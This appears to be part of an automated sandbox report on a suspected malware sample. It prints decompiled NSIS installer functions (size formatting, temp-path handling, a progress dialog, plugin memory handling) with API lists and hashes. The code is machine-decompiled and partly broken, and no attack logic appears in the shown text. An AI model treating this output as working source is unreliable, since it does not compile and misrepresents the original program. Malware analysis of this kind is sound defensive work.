                                                                            0x00401d09
                                                                            0x00401d0f
                                                                            0x00402ba4
                                                                            0x00402ba4
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                            • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                            • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                            • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 77%
                                                                            			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}



















                                                                            0x00404d4f
                                                                            0x00404d54
                                                                            0x00404d5c
                                                                            0x00404d5d
                                                                            0x00404d6a
                                                                            0x00404d72
                                                                            0x00404d73
                                                                            0x00404d75
                                                                            0x00404d77
                                                                            0x00404d79
                                                                            0x00404d7c
                                                                            0x00404d7c
                                                                            0x00404d83
                                                                            0x00404d89
                                                                            0x00404d89
                                                                            0x00404d90
                                                                            0x00404d97
                                                                            0x00404d9a
                                                                            0x00404d9d
                                                                            0x00404d9d
                                                                            0x00404da1
                                                                            0x00404db1
                                                                            0x00404db3
                                                                            0x00404db6
                                                                            0x00404d5f
                                                                            0x00404d5f
                                                                            0x00404d66
                                                                            0x00404d66
                                                                            0x00404dbe
                                                                            0x00404dc9
                                                                            0x00404ddf
                                                                            0x00404df0
                                                                            0x00404e0c

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                            • wsprintfW.USER32 ref: 00404DF0
                                                                            • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s
                                                                            • API String ID: 3540041739-3551169577
                                                                            • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                            • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                            • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                            • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 58%
                                                                            			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                            0x00405e0d
                                                                            0x00405e1a
                                                                            0x00405e1b
                                                                            0x00405e26
                                                                            0x00405e2e
                                                                            0x00405e2e
                                                                            0x00405e36

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-3355392842
                                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                            • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                            • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 713C10E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 91%
                                                                            			E713C10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x713c506c = _a8;
				 *0x713c5070 = _a16;
				 *0x713c5074 = _a12;
				_a12( *0x713c5048, E713C1651, _t73);
				_t66 =  *0x713c506c +  *0x713c506c * 4 << 3;
				_t27 = E713C12E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x713c5040;
							if( *0x713c5040 == 0) {
								goto L26;
							}
							E713C1603( *0x713c5074, _t31 + 4, _t66);
							_t34 =  *0x713c5040;
							_t86 = _t86 + 0xc;
							 *0x713c5040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E713C1312(E713C135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E713C1381(_t80, E713C12E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E713C1603(_t10,  *0x713c5074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x713c5040;
							 *0x713c5040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x713c5070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E713C1603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x713c506c +  *0x713c506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E713C1603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x713c5070);
						 *( *0x713c5070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}


























                                                                            0x713c10eb
                                                                            0x713c1100
                                                                            0x713c1109
                                                                            0x713c110e
                                                                            0x713c1119
                                                                            0x713c111c
                                                                            0x713c1125
                                                                            0x713c1129
                                                                            0x713c112b
                                                                            0x713c12b0
                                                                            0x713c12ba
                                                                            0x713c12ba
                                                                            0x713c1132
                                                                            0x713c1132
                                                                            0x713c1137
                                                                            0x713c1138
                                                                            0x713c113a
                                                                            0x713c113d
                                                                            0x713c1256
                                                                            0x713c1259
                                                                            0x713c1271
                                                                            0x713c1271
                                                                            0x713c1278
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1285
                                                                            0x713c128a
                                                                            0x713c128f
                                                                            0x713c1294
                                                                            0x713c129a
                                                                            0x713c129b
                                                                            0x00000000
                                                                            0x713c129b
                                                                            0x713c125b
                                                                            0x713c125e
                                                                            0x713c11bc
                                                                            0x713c11bf
                                                                            0x713c11c2
                                                                            0x713c11cb
                                                                            0x713c11d0
                                                                            0x00000000
                                                                            0x713c11d1
                                                                            0x713c1264
                                                                            0x713c1266
                                                                            0x713c11a2
                                                                            0x713c11a5
                                                                            0x713c11a8
                                                                            0x713c11b1
                                                                            0x00000000
                                                                            0x713c11b1
                                                                            0x713c1164
                                                                            0x713c1165
                                                                            0x713c1177
                                                                            0x713c1180
                                                                            0x713c1184
                                                                            0x713c118e
                                                                            0x713c1191
                                                                            0x713c1193
                                                                            0x713c1193
                                                                            0x00000000
                                                                            0x713c1165
                                                                            0x713c1143
                                                                            0x713c1218
                                                                            0x713c121d
                                                                            0x713c1221
                                                                            0x713c1223
                                                                            0x713c122c
                                                                            0x713c122f
                                                                            0x713c1238
                                                                            0x713c123d
                                                                            0x713c123d
                                                                            0x713c1247
                                                                            0x713c124a
                                                                            0x00000000
                                                                            0x713c1250
                                                                            0x713c1149
                                                                            0x713c114c
                                                                            0x713c11e9
                                                                            0x713c11ed
                                                                            0x713c11f7
                                                                            0x713c11fb
                                                                            0x713c1205
                                                                            0x713c120a
                                                                            0x713c1211
                                                                            0x00000000
                                                                            0x713c1211
                                                                            0x713c1152
                                                                            0x713c1155
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c115b
                                                                            0x713c115e
                                                                            0x713c11b8
                                                                            0x00000000
                                                                            0x713c11b8
                                                                            0x713c1160
                                                                            0x713c1162
                                                                            0x713c119e
                                                                            0x00000000
                                                                            0x713c119e
                                                                            0x00000000
                                                                            0x713c12a1
                                                                            0x713c12a1
                                                                            0x713c12ab
                                                                            0x00000000

                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 713C1171
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 713C11E3
                                                                            • GlobalFree.KERNEL32 ref: 713C124A
                                                                            • GlobalFree.KERNEL32(?), ref: 713C129B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C12B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 7d6f908fc414102c8aec32c61fa195b75b28f6e0b91824cdb59d36891f6a9ffe
                                                                            • Instruction ID: 5e8fbd836a05fd3ba95f9b9792cdadc451f0d4a2255245f06e916afa2e453ad2
                                                                            • Opcode Fuzzy Hash: 7d6f908fc414102c8aec32c61fa195b75b28f6e0b91824cdb59d36891f6a9ffe
                                                                            • Instruction Fuzzy Hash: 0851C0BAA04216DFE701CF69C844A267BFDFB49B19B10411AF946DB2D0EB34ED11DB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 92%
                                                                            			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp", "C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040649D(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                                            0x0040263e
                                                                            0x0040263e
                                                                            0x0040263e
                                                                            0x00402643
                                                                            0x00402646
                                                                            0x00402649
                                                                            0x0040264e
                                                                            0x00402650
                                                                            0x00402670
                                                                            0x004026aa
                                                                            0x00402672
                                                                            0x00402674
                                                                            0x00402688
                                                                            0x00402695
                                                                            0x00402695
                                                                            0x00402652
                                                                            0x00402654
                                                                            0x00402659
                                                                            0x00402667
                                                                            0x0040266a
                                                                            0x004026af
                                                                            0x004026b2
                                                                            0x0040292e
                                                                            0x0040292e
                                                                            0x004026b8
                                                                            0x004026c1
                                                                            0x004026c3
                                                                            0x004026e2
                                                                            0x004015b4
                                                                            0x004015b6
                                                                            0x00000000
                                                                            0x004015bc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004026c3
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll), ref: 00402695
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nswCA44.tmp$C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll
                                                                            • API String ID: 1659193697-2796784181
                                                                            • Opcode ID: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
                                                                            • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                            • Opcode Fuzzy Hash: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
                                                                            • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x42aa20; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x434f0c;
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}






                                                                            0x00403020
                                                                            0x0040303a
                                                                            0x00403040
                                                                            0x0040304a
                                                                            0x00403050
                                                                            0x00403056
                                                                            0x00403067
                                                                            0x00403070
                                                                            0x00000000
                                                                            0x00403075
                                                                            0x0040307c
                                                                            0x00403042
                                                                            0x00403049
                                                                            0x00403049
                                                                            0x00403022
                                                                            0x00403022
                                                                            0x00403029
                                                                            0x0040302c
                                                                            0x0040302c
                                                                            0x00403032
                                                                            0x00403039
                                                                            0x00403039

                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                            • GetTickCount.KERNEL32 ref: 0040304A
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                            • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                            • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                            • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 53%
                                                                            			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                            0x00405f20
                                                                            0x00405f2b
                                                                            0x00405f2f
                                                                            0x00405f36
                                                                            0x00405f42
                                                                            0x00405f52
                                                                            0x00405f54
                                                                            0x00405f6c
                                                                            0x00405f6d
                                                                            0x00405f74
                                                                            0x00405f75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405f58
                                                                            0x00405f5f
                                                                            0x00405f67
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405f5f
                                                                            0x00405f77
                                                                            0x00000000
                                                                            0x00405f8b
                                                                            0x00405f44
                                                                            0x00405f4a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405f4a
                                                                            0x00405f31
                                                                            0x00000000

                                                                            APIs
                                                                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76FA3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76FA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                            • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,76FA3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76FA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                            • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76FA3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76FA3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
